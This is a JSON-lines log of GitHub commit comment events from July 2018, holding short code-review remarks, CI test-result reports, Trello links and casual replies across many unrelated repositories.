{"id":"8019898732","type":"CommitCommentEvent","actor":{"login":"ReKTDevlol"},"repo":{"name":"ReKTDevlol/NekoBot"},"payload":{"comment":{"id":29837803,"position":null,"line":null,"path":null,"commit_id":"432f96bc4429dc92d041ddb46bd48fb174f6aa6f","created_at":"2018-07-26T01:31:51Z","updated_at":"2018-07-26T01:31:51Z","author_association":"OWNER","body":"py>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nihas2much unused shitinside"}},"created_at":"2018-07-26T01:31:51Z"}
{"id":"8019902090","type":"CommitCommentEvent","actor":{"login":"CFTheMaster"},"repo":{"name":"ReKTDevlol/NekoBot"},"payload":{"comment":{"id":29837805,"position":null,"line":null,"path":null,"commit_id":"432f96bc4429dc92d041ddb46bd48fb174f6aa6f","created_at":"2018-07-26T01:33:07Z","updated_at":"2018-07-26T01:33:07Z","author_association":"COLLABORATOR","body":"lel"}},"created_at":"2018-07-26T01:33:07Z"}
{"id":"8019902294","type":"CommitCommentEvent","actor":{"login":"Nhowka"},"repo":{"name":"Zaid-Ajaj/tabula-rasa"},"payload":{"comment":{"id":29837806,"position":12,"line":27,"path":"README.md","commit_id":"971f69b3d51a6bfed088ae724c247f06e23b1c61","created_at":"2018-07-26T01:33:11Z","updated_at":"2018-07-26T01:33:11Z","author_association":"NONE","body":"Yay, adoption! 😍"}},"created_at":"2018-07-26T01:33:11Z"}
{"id":"8019906777","type":"CommitCommentEvent","actor":{"login":"ethanmad"},"repo":{"name":"progrhyme/hugo-theme-bootie-docs"},"payload":{"comment":{"id":29837811,"position":11,"line":38,"path":"layouts/partials/header.html","commit_id":"5b14e4081c0d6d591150df486f558640f8c7c8be","created_at":"2018-07-26T01:34:50Z","updated_at":"2018-07-26T01:34:50Z","author_association":"NONE","body":"This isn't working for me since updating to include this commit (among other things). See for example http://umich.edu/~fencing/results/."}},"created_at":"2018-07-26T01:34:50Z"}
{"id":"8019907019","type":"CommitCommentEvent","actor":{"login":"mtvillwock"},"repo":{"name":"ideo/c-delta-challenge"},"payload":{"comment":{"id":29837812,"position":98,"line":148,"path":"README.md","commit_id":"2403bed5458a85636cab3956c5d93cef7d2a93ce","created_at":"2018-07-26T01:34:56Z","updated_at":"2018-07-26T01:34:56Z","author_association":"NONE","body":"This says `total, raw, and `... Is it missing `max`? There also seem to be instructions for `total` missing?"}},"created_at":"2018-07-26T01:34:56Z"}
{"id":"8019907167","type":"CommitCommentEvent","actor":{"login":"kingtran2112"},"repo":{"name":"kingtran2112/blog-client"},"payload":{"comment":{"id":29837813,"position":null,"line":null,"path":null,"commit_id":"2719ab1bc7a5724e0f988ae2a27063ba65b58cab","created_at":"2018-07-26T01:34:59Z","updated_at":"2018-07-26T01:34:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create home content](https://trello.com/c/c7NggSEv/4-create-home-content)"}},"created_at":"2018-07-26T01:34:59Z"}
{"id":"8019908643","type":"CommitCommentEvent","actor":{"login":"ZeroChaos-"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29837814,"position":null,"line":null,"path":null,"commit_id":"3851b896e4862b204a9969012cb584a77568c892","created_at":"2018-07-26T01:35:29Z","updated_at":"2018-07-26T01:35:29Z","author_association":"CONTRIBUTOR","body":"we don't unmask pentoo-misc :-P\n\nOn Wed, Jul 25, 2018 at 6:36 PM, Anton Bolshakov <notifications@github.com>\nwrote:\n\n> How did i break if we unmask them?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pentoo/pentoo-overlay/commit/3851b896e4862b204a9969012cb584a77568c892#commitcomment-29836462>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABl--ROwOXYVsTHN6t1sKU_4B2X5lcGUks5uKPL_gaJpZM4VgW-R>\n> .\n>\n"}},"created_at":"2018-07-26T01:35:29Z"}
{"id":"8019908809","type":"CommitCommentEvent","actor":{"login":"roidayan"},"repo":{"name":"roidayan/lnst-hw-offload-config"},"payload":{"comment":{"id":29837815,"position":null,"line":null,"path":null,"commit_id":"724909b9731954bd0a1bf2ac26651473116ca886","created_at":"2018-07-26T01:35:32Z","updated_at":"2018-07-26T01:35:32Z","author_association":"OWNER","body":"The commit msg is not correct. Upstream kernel doesn't have devlink as built-in by default."}},"created_at":"2018-07-26T01:35:32Z"}
{"id":"8019912509","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837820,"position":15,"line":15,"path":"Task3/DataProvider.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T01:36:59Z","updated_at":"2018-07-26T01:36:59Z","author_association":"OWNER","body":"Указать типы данных в phpDoc"}},"created_at":"2018-07-26T01:36:59Z"}
{"id":"8019912669","type":"CommitCommentEvent","actor":{"login":"pratiknikam"},"repo":{"name":"Learnosity/vagrant-nfs_guest"},"payload":{"comment":{"id":29837821,"position":null,"line":null,"path":null,"commit_id":"d0db0eba6dfb7efd78d0477583ea64dd5ccbb66f","created_at":"2018-07-26T01:37:01Z","updated_at":"2018-07-26T01:37:01Z","author_association":"NONE","body":"Good one"}},"created_at":"2018-07-26T01:37:01Z"}
{"id":"8019914991","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837823,"position":11,"line":11,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T01:37:54Z","updated_at":"2018-07-26T01:37:54Z","author_association":"OWNER","body":"Название класса не отражает сути"}},"created_at":"2018-07-26T01:37:54Z"}
{"id":"8019918170","type":"CommitCommentEvent","actor":{"login":"mike0022"},"repo":{"name":"mike0022/Security-System"},"payload":{"comment":{"id":29837824,"position":null,"line":null,"path":null,"commit_id":"3c893949b6d9092c923e84b14f342882e4653975","created_at":"2018-07-26T01:39:04Z","updated_at":"2018-07-26T01:39:04Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Raspbian OS Installation](https://trello.com/c/j3aHy79j/79-raspbian-os-installation)"}},"created_at":"2018-07-26T01:39:04Z"}
{"id":"8019918524","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837825,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-26T01:39:12Z","updated_at":"2018-07-26T01:39:12Z","author_association":"NONE","body":"159313706_Issue#6796 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T01:39:12Z"}
{"id":"8019920294","type":"CommitCommentEvent","actor":{"login":"matiboux"},"repo":{"name":"OliFramework/Oli"},"payload":{"comment":{"id":29837829,"position":null,"line":null,"path":null,"commit_id":"97503bbf4c1e5a78e0546d7a9201ea3785b6e560","created_at":"2018-07-26T01:39:50Z","updated_at":"2018-07-26T01:39:50Z","author_association":"MEMBER","body":"**Added**! Oh my god that typo.."}},"created_at":"2018-07-26T01:39:50Z"}
{"id":"8019925125","type":"CommitCommentEvent","actor":{"login":"jerlyn17"},"repo":{"name":"jerlyn17/Security-System"},"payload":{"comment":{"id":29837835,"position":null,"line":null,"path":null,"commit_id":"023f8325b987268e3c895cb78a196645c971d374","created_at":"2018-07-26T01:41:38Z","updated_at":"2018-07-26T01:41:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [STEP 4: INSTALLING OPENCV 3.3.0 AND PYTHON 3 ON RASPBERRY PI 3](https://trello.com/c/8aLWtYP9/80-step-4-installing-opencv-330-and-python-3-on-raspberry-pi-3)"}},"created_at":"2018-07-26T01:41:38Z"}
{"id":"8019925226","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837837,"position":55,"line":55,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T01:41:40Z","updated_at":"2018-07-26T01:41:40Z","author_association":"OWNER","body":"Неизвестная ошибка. Вывести ошибку в лог.\r\n` $this->logger->critical('An error occurred: ' . $e->getMessage());\r\n            throw $e;`"}},"created_at":"2018-07-26T01:41:40Z"}
{"id":"8019925766","type":"CommitCommentEvent","actor":{"login":"mike0022"},"repo":{"name":"mike0022/Security-System"},"payload":{"comment":{"id":29837838,"position":null,"line":null,"path":null,"commit_id":"22a572934c7d9f938e70b85905c3dade60b5b664","created_at":"2018-07-26T01:41:53Z","updated_at":"2018-07-26T01:41:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Raspbian OS Installation](https://trello.com/c/j3aHy79j/79-raspbian-os-installation)"}},"created_at":"2018-07-26T01:41:53Z"}
{"id":"8019927514","type":"CommitCommentEvent","actor":{"login":"michael13162"},"repo":{"name":"SynBioDex/SBOLDesigner"},"payload":{"comment":{"id":29837840,"position":null,"line":null,"path":null,"commit_id":"40fae55741d476ac6877b0e2e8c2a75f5301d074","created_at":"2018-07-26T01:42:31Z","updated_at":"2018-07-26T01:42:31Z","author_association":"CONTRIBUTOR","body":"Line 343, does String uri need to stay and be declared?"}},"created_at":"2018-07-26T01:42:31Z"}
{"id":"8019929480","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837841,"position":35,"line":35,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T01:43:18Z","updated_at":"2018-07-26T01:43:18Z","author_association":"OWNER","body":"phpDoc нет в родителе."}},"created_at":"2018-07-26T01:43:18Z"}
{"id":"8019933017","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29837843,"position":null,"line":null,"path":null,"commit_id":"e80656c48b015cc7410e7c7e976766b65d173b8e","created_at":"2018-07-26T01:44:40Z","updated_at":"2018-07-26T01:44:40Z","author_association":"OWNER","body":"Check for 8f8826cdc017b89bb2b9ea96759ce9cf55f281c9"}},"created_at":"2018-07-26T01:44:40Z"}
{"id":"8019933698","type":"CommitCommentEvent","actor":{"login":"remexre"},"repo":{"name":"acmumn/website"},"payload":{"comment":{"id":29837845,"position":null,"line":null,"path":null,"commit_id":"ca9ccfe1f193c62caa1628592e51a94bccc593bc","created_at":"2018-07-26T01:44:55Z","updated_at":"2018-07-26T01:44:55Z","author_association":"CONTRIBUTOR","body":":-1: "}},"created_at":"2018-07-26T01:44:55Z"}
{"id":"8019937323","type":"CommitCommentEvent","actor":{"login":"mazbrili"},"repo":{"name":"mazbrili/al-anvar"},"payload":{"comment":{"id":29837851,"position":12,"line":46,"path":"sendermail/smtpclient.cpp","commit_id":"3ee25a93ac553bea90ff4dbd2591f8d4aee8f3fd","created_at":"2018-07-26T01:46:13Z","updated_at":"2018-07-26T01:46:13Z","author_association":"OWNER","body":"just save file source as utf-8 encoding and remove this conversion"}},"created_at":"2018-07-26T01:46:13Z"}
{"id":"8019941282","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837852,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T01:47:46Z","updated_at":"2018-07-26T01:47:46Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: Tests Failed (764 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-32.9%25-red.png)</a> \n"}},"created_at":"2018-07-26T01:47:46Z"}
{"id":"8019944157","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837855,"position":28,"line":28,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T01:48:52Z","updated_at":"2018-07-26T01:48:52Z","author_association":"OWNER","body":"WET? 😃 Функция не используется."}},"created_at":"2018-07-26T01:48:52Z"}
{"id":"8019947506","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29837859,"position":null,"line":null,"path":null,"commit_id":"2f84870da41ae1b56d42fcf5bfc5b73010e8f982","created_at":"2018-07-26T01:50:08Z","updated_at":"2018-07-26T01:50:08Z","author_association":"OWNER","body":"@locutus2 Thank you!  I've merged this in and am starting two more tests, one with double effect and one with half (since the `/ 2` failed Elo-neutral, +0.1 Elo)."}},"created_at":"2018-07-26T01:50:08Z"}
{"id":"8019949384","type":"CommitCommentEvent","actor":{"login":"iptq"},"repo":{"name":"acmumn/website"},"payload":{"comment":{"id":29837862,"position":null,"line":null,"path":null,"commit_id":"ca9ccfe1f193c62caa1628592e51a94bccc593bc","created_at":"2018-07-26T01:50:49Z","updated_at":"2018-07-26T01:50:49Z","author_association":"CONTRIBUTOR","body":"The."}},"created_at":"2018-07-26T01:50:49Z"}
{"id":"8019949579","type":"CommitCommentEvent","actor":{"login":"VladGogolev"},"repo":{"name":"VladGogolev/SETest"},"payload":{"comment":{"id":29837863,"position":61,"line":61,"path":"Task3/DecoratorManager.php","commit_id":"a82691e4249c911fe99f1d6fb589fba8b3e6757f","created_at":"2018-07-26T01:50:53Z","updated_at":"2018-07-26T01:50:53Z","author_association":"OWNER","body":"Функцию лучше сделать приватной и добавить phpDoc. "}},"created_at":"2018-07-26T01:50:53Z"}
{"id":"8019951344","type":"CommitCommentEvent","actor":{"login":"shuyaxx"},"repo":{"name":"zq99299/newstudy"},"payload":{"comment":{"id":29837865,"position":null,"line":null,"path":null,"commit_id":"9823c3ad6fab0bdabd123211a31b7a1755381123","created_at":"2018-07-26T01:51:32Z","updated_at":"2018-07-26T01:51:32Z","author_association":"NONE","body":"厉害！！！"}},"created_at":"2018-07-26T01:51:32Z"}
{"id":"8019952010","type":"CommitCommentEvent","actor":{"login":"garywong-bc"},"repo":{"name":"bcgov/gwells"},"payload":{"comment":{"id":29837866,"position":null,"line":null,"path":null,"commit_id":"ed94c3435e8cbe097c813571d20e22feab352348","created_at":"2018-07-26T01:51:46Z","updated_at":"2018-07-26T01:51:46Z","author_association":"COLLABORATOR","body":"If you're going to drop and recreate the DB, be sure to recreate the permissions, the extension permissions (e.g. foreign data wrapper, pg_crypto, etc.).  We want DEV to be similarly configures as TEST and PROD."}},"created_at":"2018-07-26T01:51:46Z"}
{"id":"8019962741","type":"CommitCommentEvent","actor":{"login":"Ostraptor"},"repo":{"name":"Ostraptor/Hacking-Information"},"payload":{"comment":{"id":29837873,"position":5,"line":3,"path":"README.md","commit_id":"fd0dcdd6825cd45393913b51b54be31954da29d7","created_at":"2018-07-26T01:55:32Z","updated_at":"2018-07-26T01:55:32Z","author_association":"OWNER","body":"Delete"}},"created_at":"2018-07-26T01:55:32Z"}
{"id":"8019963616","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29837874,"position":112,"line":90,"path":"src/hdskins/java/com/voxelmodpack/hdskins/skins/LegacySkinServer.java","commit_id":"c72120efd1c006f628adef44c7479f8610b814ac","created_at":"2018-07-26T01:55:51Z","updated_at":"2018-07-26T01:55:51Z","author_association":"MEMBER","body":"How would that work? `AbstractSkinServer` has no concept of a gateway server."}},"created_at":"2018-07-26T01:55:51Z"}
{"id":"8019963825","type":"CommitCommentEvent","actor":{"login":"Ostraptor"},"repo":{"name":"Ostraptor/Hacking-Information"},"payload":{"comment":{"id":29837875,"position":16,"line":14,"path":"README.md","commit_id":"fd0dcdd6825cd45393913b51b54be31954da29d7","created_at":"2018-07-26T01:55:56Z","updated_at":"2018-07-26T01:55:56Z","author_association":"OWNER","body":"Hello "}},"created_at":"2018-07-26T01:55:56Z"}
{"id":"8019964529","type":"CommitCommentEvent","actor":{"login":"Ostraptor"},"repo":{"name":"Ostraptor/Hacking-Information"},"payload":{"comment":{"id":29837877,"position":17,"line":15,"path":"README.md","commit_id":"fd0dcdd6825cd45393913b51b54be31954da29d7","created_at":"2018-07-26T01:56:09Z","updated_at":"2018-07-26T01:56:09Z","author_association":"OWNER","body":"Hello guys! "}},"created_at":"2018-07-26T01:56:09Z"}
{"id":"8019965258","type":"CommitCommentEvent","actor":{"login":"Ostraptor"},"repo":{"name":"Ostraptor/Hacking-Information"},"payload":{"comment":{"id":29837879,"position":18,"line":16,"path":"README.md","commit_id":"fd0dcdd6825cd45393913b51b54be31954da29d7","created_at":"2018-07-26T01:56:23Z","updated_at":"2018-07-26T01:56:23Z","author_association":"OWNER","body":"Welcome to this page"}},"created_at":"2018-07-26T01:56:23Z"}
{"id":"8019967662","type":"CommitCommentEvent","actor":{"login":"Ostraptor"},"repo":{"name":"Ostraptor/Hacking-Information"},"payload":{"comment":{"id":29837882,"position":28,"line":26,"path":"README.md","commit_id":"fd0dcdd6825cd45393913b51b54be31954da29d7","created_at":"2018-07-26T01:57:16Z","updated_at":"2018-07-26T01:57:16Z","author_association":"OWNER","body":"**ostraptor**"}},"created_at":"2018-07-26T01:57:16Z"}
{"id":"8019968248","type":"CommitCommentEvent","actor":{"login":"macaroonable"},"repo":{"name":"macaroonable/flip_game_react"},"payload":{"comment":{"id":29837884,"position":null,"line":null,"path":null,"commit_id":"a6dcd0eaf6a2e2ca73f5a93d5ea4264ea13057ad","created_at":"2018-07-26T01:57:29Z","updated_at":"2018-07-26T01:57:29Z","author_association":"OWNER","body":"@silverelizard thanks to your feedback today 👍 "}},"created_at":"2018-07-26T01:57:29Z"}
{"id":"8019972476","type":"CommitCommentEvent","actor":{"login":"410513097"},"repo":{"name":"ldqk/softs"},"payload":{"comment":{"id":29837888,"position":null,"line":null,"path":null,"commit_id":"0474700128130ada2fc49f94346bd99677d1bd22","created_at":"2018-07-26T01:59:02Z","updated_at":"2018-07-26T01:59:02Z","author_association":"NONE","body":"怎么下载啊，点了没反应呢"}},"created_at":"2018-07-26T01:59:02Z"}
{"id":"8019972829","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29837890,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-26T01:59:11Z","updated_at":"2018-07-26T01:59:11Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2394 of 2964 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 500 tests had: ESO small diffs.\n * 566 tests had: Table big diffs.\n * 362 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 87 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 21 tests had: ERR diffs.\n * 20 tests had: ZSZ small diffs.\n * 2 tests had: MTD diffs.\n * 10 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.77%25-red.png)</a> \n"}},"created_at":"2018-07-26T01:59:11Z"}
{"id":"8019973003","type":"CommitCommentEvent","actor":{"login":"MachinoNekomata"},"repo":{"name":"MinatsuT/PSoC5_USB_Keyboard"},"payload":{"comment":{"id":29837891,"position":null,"line":null,"path":null,"commit_id":"b858528e7adf5951f246221cba2e3d8b4be47625","created_at":"2018-07-26T01:59:15Z","updated_at":"2018-07-26T01:59:15Z","author_association":"NONE","body":"Minatsu様、ご指摘の通り、UARTのClockをInteternalにすることで通信ができました。ありがとうございます。"}},"created_at":"2018-07-26T01:59:15Z"}
{"id":"8021694182","type":"CommitCommentEvent","actor":{"login":"waiwaiku"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29841505,"position":null,"line":null,"path":null,"commit_id":"00afce3a4bf3085fe8309435a03d2597a519bef8","created_at":"2018-07-26T10:00:32Z","updated_at":"2018-07-26T10:00:32Z","author_association":"NONE","body":"file:  components/date-picker/RangePicker.tsx\r\nthis <a> element changed to <Tag> component, i have to config the custom style then failed, so i revert to tag v3.6.6 resolved.\r\nif replace the <a> element to <Tag>, i hope it can config the prefixCls props through the parent component, thx."}},"created_at":"2018-07-26T10:00:32Z"}
{"id":"8021694546","type":"CommitCommentEvent","actor":{"login":"KamiSempai"},"repo":{"name":"bipinvaylu/awesome-kotlin-native"},"payload":{"comment":{"id":29841506,"position":null,"line":null,"path":null,"commit_id":"18aa3e7f230f2a833ce6ba4b398164fd0b58f005","created_at":"2018-07-26T10:00:36Z","updated_at":"2018-07-26T10:00:36Z","author_association":"COLLABORATOR","body":"Does it already have support of Kotlin Native? I don't see any mention of Native support in ReadMe."}},"created_at":"2018-07-26T10:00:36Z"}
{"id":"8021708441","type":"CommitCommentEvent","actor":{"login":"Fighting01"},"repo":{"name":"haxpor/Potatso"},"payload":{"comment":{"id":29841520,"position":null,"line":null,"path":null,"commit_id":"687af88c9f5e0c2ea5957f8e185d739e2d3adc5d","created_at":"2018-07-26T10:03:08Z","updated_at":"2018-07-26T10:03:08Z","author_association":"NONE","body":"\r\n[!] Error installing LibYAML\r\n[!] /usr/bin/curl -f -L -o /var/folders/mq/8cvcnk_j2sd48nfvyb_77qb00000gn/T/d20180726-41443-fwqvx7/file.tgz http://pyyaml.org/download/libyaml/yaml-0.1.4.tar.gz --create-dirs --netrc-optional --retry 2\r\n\r\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (7) Failed to connect to pyyaml.org port 80: Connection refused\r\n\r\n\r\n[!] 'LibYAML' uses the unencrypted http protocol to transfer the Pod. Please be sure you're in a safe network with only trusted hosts in there. Please reach out to the library author to notify them of this security issue.\r\n"}},"created_at":"2018-07-26T10:03:08Z"}
{"id":"8021713113","type":"CommitCommentEvent","actor":{"login":"Fighting01"},"repo":{"name":"haxpor/Potatso"},"payload":{"comment":{"id":29841529,"position":null,"line":null,"path":null,"commit_id":"687af88c9f5e0c2ea5957f8e185d739e2d3adc5d","created_at":"2018-07-26T10:04:01Z","updated_at":"2018-07-26T10:04:01Z","author_association":"NONE","body":"can u fix it"}},"created_at":"2018-07-26T10:04:01Z"}
{"id":"8021715395","type":"CommitCommentEvent","actor":{"login":"avi3333"},"repo":{"name":"avi3333/bg-generator"},"payload":{"comment":{"id":29841535,"position":null,"line":null,"path":null,"commit_id":"9a1bccc927c505b947a7729ae77622d119a09bc7","created_at":"2018-07-26T10:04:28Z","updated_at":"2018-07-26T10:04:28Z","author_association":"OWNER","body":"Nice"}},"created_at":"2018-07-26T10:04:28Z"}
{"id":"8021717776","type":"CommitCommentEvent","actor":{"login":"talhasch"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29841536,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T10:04:56Z","updated_at":"2018-07-26T10:04:56Z","author_association":"CONTRIBUTOR","body":"done 🎉 check last commit"}},"created_at":"2018-07-26T10:04:56Z"}
{"id":"8021719821","type":"CommitCommentEvent","actor":{"login":"gtl90"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29841540,"position":null,"line":null,"path":null,"commit_id":"cf232e1f32debe715bdb0f619622d23554320b23","created_at":"2018-07-26T10:05:19Z","updated_at":"2018-07-26T10:05:19Z","author_association":"COLLABORATOR","body":"I think this is needed for travis to run..."}},"created_at":"2018-07-26T10:05:19Z"}
{"id":"8021727550","type":"CommitCommentEvent","actor":{"login":"abias"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29841554,"position":21,"line":21,"path":"templates/help_icon.mustache","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-26T10:06:48Z","updated_at":"2018-07-26T10:06:48Z","author_association":"MEMBER","body":"Typo: attrubutes"}},"created_at":"2018-07-26T10:06:48Z"}
{"id":"8021736841","type":"CommitCommentEvent","actor":{"login":"abias"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29841568,"position":15,"line":591,"path":"settings.php","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-26T10:08:36Z","updated_at":"2018-07-26T10:08:36Z","author_association":"MEMBER","body":"These 2 lines are not indented as it was done in the existing settings"}},"created_at":"2018-07-26T10:08:36Z"}
{"id":"8021737859","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29841570,"position":11,"line":15,"path":"README.md","commit_id":"68545aec347a05ce519bbfe73fa3e11a59212557","created_at":"2018-07-26T10:08:49Z","updated_at":"2018-07-26T10:08:49Z","author_association":"NONE","body":"Don't use uppercase. Instead, \"Lampa Lab\" in Ukraine is the correct spelling."}},"created_at":"2018-07-26T10:08:49Z"}
{"id":"8021742118","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841574,"position":16,"line":16,"path":"lesson4/station.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:09:38Z","updated_at":"2018-07-26T10:09:38Z","author_association":"NONE","body":"ТЗ: \"В классе Station (жд станция) создать метод класса all, который возвращает все станции (объекты), созданные на данный момент\"\r\nэтот метод возвращает не объекты, а число\r\nчто-то здесь не так ))"}},"created_at":"2018-07-26T10:09:38Z"}
{"id":"8021744286","type":"CommitCommentEvent","actor":{"login":"povilasb"},"repo":{"name":"canndrew/netsim"},"payload":{"comment":{"id":29841578,"position":4,"line":20,"path":"src/util/ipv6_addr.rs","commit_id":"ddf94cba3def73a3f819067ab937dc05bdf01e9b","created_at":"2018-07-26T10:10:04Z","updated_at":"2018-07-26T10:10:04Z","author_association":"COLLABORATOR","body":"Typo: `IPv6`.."}},"created_at":"2018-07-26T10:10:04Z"}
{"id":"8021747591","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841584,"position":15,"line":15,"path":"lesson4/train.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:10:44Z","updated_at":"2018-07-26T10:10:44Z","author_association":"NONE","body":"а что здесь делает эта переменная?"}},"created_at":"2018-07-26T10:10:44Z"}
{"id":"8021747867","type":"CommitCommentEvent","actor":{"login":"llwswxy"},"repo":{"name":"llwswxy/mycode"},"payload":{"comment":{"id":29841585,"position":null,"line":null,"path":null,"commit_id":"5c84109d649a15188a46488b3f429a7e023ed034","created_at":"2018-07-26T10:10:47Z","updated_at":"2018-07-26T10:10:47Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-26T10:10:47Z"}
{"id":"8021751917","type":"CommitCommentEvent","actor":{"login":"abias"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29841598,"position":10,"line":877,"path":"scss/post.scss","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-26T10:11:36Z","updated_at":"2018-07-26T10:11:36Z","author_association":"MEMBER","body":"Will you need `/* stylelint-disable declaration-no-important */` like you did in\r\nhttps://github.com/moodle/moodle/compare/master...Kathrin84:MDL-62723-master#diff-63509c2f6854f57110eda97108f8f565R5 ?"}},"created_at":"2018-07-26T10:11:36Z"}
